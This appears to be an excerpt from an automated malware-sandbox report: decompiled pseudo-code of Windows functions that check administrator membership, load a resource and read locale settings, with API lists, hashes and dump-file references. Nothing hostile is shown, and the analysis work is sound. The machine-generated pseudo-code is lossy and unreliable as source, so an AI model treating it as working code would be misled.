                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 3785188418-3940384054
                                                                                                                                                                                                                                            • Opcode ID: a872adb4a06e1668fa1643465e30eb5496a16036e02727afb50d341bcf192bf4
                                                                                                                                                                                                                                            • Instruction ID: dbbcba6bcc88df969d1b45d2f348226155effa0f0f90e260bc554e308a6eede0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a872adb4a06e1668fa1643465e30eb5496a16036e02727afb50d341bcf192bf4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C11B431205625BBDB336F24BC0DBAA3A6CFB46730F110618F915D11E0DB78A662D792
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E003218A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0x328128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E00326CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E003217EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0x328128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x328128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x003218a3
                                                                                                                                                                                                                                            0x003218a3
                                                                                                                                                                                                                                            0x003218ab
                                                                                                                                                                                                                                            0x003218b2
                                                                                                                                                                                                                                            0x003218b5
                                                                                                                                                                                                                                            0x003218be
                                                                                                                                                                                                                                            0x003218c0
                                                                                                                                                                                                                                            0x003218c6
                                                                                                                                                                                                                                            0x003218c7
                                                                                                                                                                                                                                            0x003218ca
                                                                                                                                                                                                                                            0x003218cf
                                                                                                                                                                                                                                            0x003219c9
                                                                                                                                                                                                                                            0x003219d8
                                                                                                                                                                                                                                            0x003219d8
                                                                                                                                                                                                                                            0x003218df
                                                                                                                                                                                                                                            0x003219b8
                                                                                                                                                                                                                                            0x003219bd
                                                                                                                                                                                                                                            0x003219bf
                                                                                                                                                                                                                                            0x003219bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003219bd
                                                                                                                                                                                                                                            0x003218fa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321912
                                                                                                                                                                                                                                            0x003219aa
                                                                                                                                                                                                                                            0x003219ad
                                                                                                                                                                                                                                            0x003219b3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321927
                                                                                                                                                                                                                                            0x00321927
                                                                                                                                                                                                                                            0x00321932
                                                                                                                                                                                                                                            0x00321936
                                                                                                                                                                                                                                            0x003219a9
                                                                                                                                                                                                                                            0x003219a9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003219a9
                                                                                                                                                                                                                                            0x0032194c
                                                                                                                                                                                                                                            0x003219a2
                                                                                                                                                                                                                                            0x003219a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032196e
                                                                                                                                                                                                                                            0x00321970
                                                                                                                                                                                                                                            0x00321999
                                                                                                                                                                                                                                            0x0032199c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032199c
                                                                                                                                                                                                                                            0x00321972
                                                                                                                                                                                                                                            0x00321972
                                                                                                                                                                                                                                            0x00321975
                                                                                                                                                                                                                                            0x00321984
                                                                                                                                                                                                                                            0x00321985
                                                                                                                                                                                                                                            0x0032198a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032198c
                                                                                                                                                                                                                                            0x00321991
                                                                                                                                                                                                                                            0x00321996
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321996
                                                                                                                                                                                                                                            0x0032194c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003218DD), ref: 0032181A
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0032182C
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: AllocateAndInitializeSid.ADVAPI32(003218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003218DD), ref: 00321855
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: FreeSid.ADVAPI32(?,?,?,?,003218DD), ref: 00321883
                                                                                                                                                                                                                                              • Part of subcall function 003217EE: FreeLibrary.KERNEL32(00000000,?,?,?,003218DD), ref: 0032188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003218EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 003218F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0032190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00321918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 0032192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00321944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00321964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 0032197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0032199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003219A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 003219AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: 7f8ab9e78f7b3b680fa90f8dcd3aa7e05c9155a827d6e78d17293a29f1bea5b8
                                                                                                                                                                                                                                            • Instruction ID: d99558c18282bf1b86f854eaca2979b4b4fc2abe221bc6793bbbb22710492382
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f8ab9e78f7b3b680fa90f8dcd3aa7e05c9155a827d6e78d17293a29f1bea5b8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2316F71A00219AFDB22DFA5ED48EBFBBBCFF18710F104429E545D2150DB309946CBA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E0032468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00324699
                                                                                                                                                                                                                                            0x0032469b
                                                                                                                                                                                                                                            0x003246a9
                                                                                                                                                                                                                                            0x003246af
                                                                                                                                                                                                                                            0x003246b4
                                                                                                                                                                                                                                            0x003246bc
                                                                                                                                                                                                                                            0x003246f9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003246f9
                                                                                                                                                                                                                                            0x003246d9
                                                                                                                                                                                                                                            0x003246dd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003246e5
                                                                                                                                                                                                                                            0x003246ef
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003246f5
                                                                                                                                                                                                                                            0x003246ff

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$cent
                                                                                                                                                                                                                                            • API String ID: 3370778649-3553536280
                                                                                                                                                                                                                                            • Opcode ID: 630219816d3bf2109a5e49eb12e82d532472fe13a9077d0fabd22b05bc13b9d2
                                                                                                                                                                                                                                            • Instruction ID: e431cf7f3651a775fc0972f210b03c84d01df5597e8c25589f82f64feca2f2f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 630219816d3bf2109a5e49eb12e82d532472fe13a9077d0fabd22b05bc13b9d2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601A9362447217BE33217A56C4DF6B7E2CDBC6F62F064018FE4A97150C971885286B6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E0032681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0x3281d8; // 0x0
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0x3281d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0x3281d8; // 0x0
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0x321140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E003266F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0x3281d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t18 =  &_v8; // 0x32463b
                                                                                                                                                                                                                                            				return E00326CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x0032681f
                                                                                                                                                                                                                                            0x0032682a
                                                                                                                                                                                                                                            0x00326831
                                                                                                                                                                                                                                            0x00326836
                                                                                                                                                                                                                                            0x0032683c
                                                                                                                                                                                                                                            0x0032683e
                                                                                                                                                                                                                                            0x00326848
                                                                                                                                                                                                                                            0x00326851
                                                                                                                                                                                                                                            0x0032685d
                                                                                                                                                                                                                                            0x00326864
                                                                                                                                                                                                                                            0x00326876
                                                                                                                                                                                                                                            0x0032693a
                                                                                                                                                                                                                                            0x0032693a
                                                                                                                                                                                                                                            0x0032687c
                                                                                                                                                                                                                                            0x0032687e
                                                                                                                                                                                                                                            0x00326885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003268d6
                                                                                                                                                                                                                                            0x003268f4
                                                                                                                                                                                                                                            0x00326900
                                                                                                                                                                                                                                            0x00326902
                                                                                                                                                                                                                                            0x0032690a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032690c
                                                                                                                                                                                                                                            0x0032690c
                                                                                                                                                                                                                                            0x0032691c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032691e
                                                                                                                                                                                                                                            0x00326924
                                                                                                                                                                                                                                            0x0032692b
                                                                                                                                                                                                                                            0x00326932
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032692b
                                                                                                                                                                                                                                            0x0032691c
                                                                                                                                                                                                                                            0x0032690a
                                                                                                                                                                                                                                            0x00326885
                                                                                                                                                                                                                                            0x00326876
                                                                                                                                                                                                                                            0x00326940
                                                                                                                                                                                                                                            0x00326951

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0032686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 003268A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003268CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00321140,00000000,?,?,0000000C), ref: 003268F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00326902
                                                                                                                                                                                                                                              • Part of subcall function 003266F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0032691A), ref: 00326741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: ;F2$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-2325406992
                                                                                                                                                                                                                                            • Opcode ID: e150846a5d4d9d008fb00e794e277285587c27dd6f240a278ee9f79ff46ba485
                                                                                                                                                                                                                                            • Instruction ID: 1a8ebcbbdae293b9b4885e6441ee19caa41661c9536fe1f630613d466510e03d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e150846a5d4d9d008fb00e794e277285587c27dd6f240a278ee9f79ff46ba485
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26316131A01238DFDB33CB11EC46BAAB77CEF85768F0141A9E949A6140DB309D96CF52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E003217EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0x32a288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x003217f6
                                                                                                                                                                                                                                            0x003217fd
                                                                                                                                                                                                                                            0x00321805
                                                                                                                                                                                                                                            0x0032180b
                                                                                                                                                                                                                                            0x0032180d
                                                                                                                                                                                                                                            0x00321815
                                                                                                                                                                                                                                            0x00321818
                                                                                                                                                                                                                                            0x00321820
                                                                                                                                                                                                                                            0x00321824
                                                                                                                                                                                                                                            0x0032182c
                                                                                                                                                                                                                                            0x00321832
                                                                                                                                                                                                                                            0x00321837
                                                                                                                                                                                                                                            0x00321851
                                                                                                                                                                                                                                            0x00321854
                                                                                                                                                                                                                                            0x0032185d
                                                                                                                                                                                                                                            0x00321862
                                                                                                                                                                                                                                            0x0032186c
                                                                                                                                                                                                                                            0x00321872
                                                                                                                                                                                                                                            0x00321877
                                                                                                                                                                                                                                            0x0032187e
                                                                                                                                                                                                                                            0x0032187e
                                                                                                                                                                                                                                            0x00321883
                                                                                                                                                                                                                                            0x00321883
                                                                                                                                                                                                                                            0x0032185d
                                                                                                                                                                                                                                            0x0032188a
                                                                                                                                                                                                                                            0x0032188a
                                                                                                                                                                                                                                            0x003218a2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003218DD), ref: 0032181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0032182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(003218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003218DD), ref: 00321855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,003218DD), ref: 00321883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,003218DD), ref: 0032188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
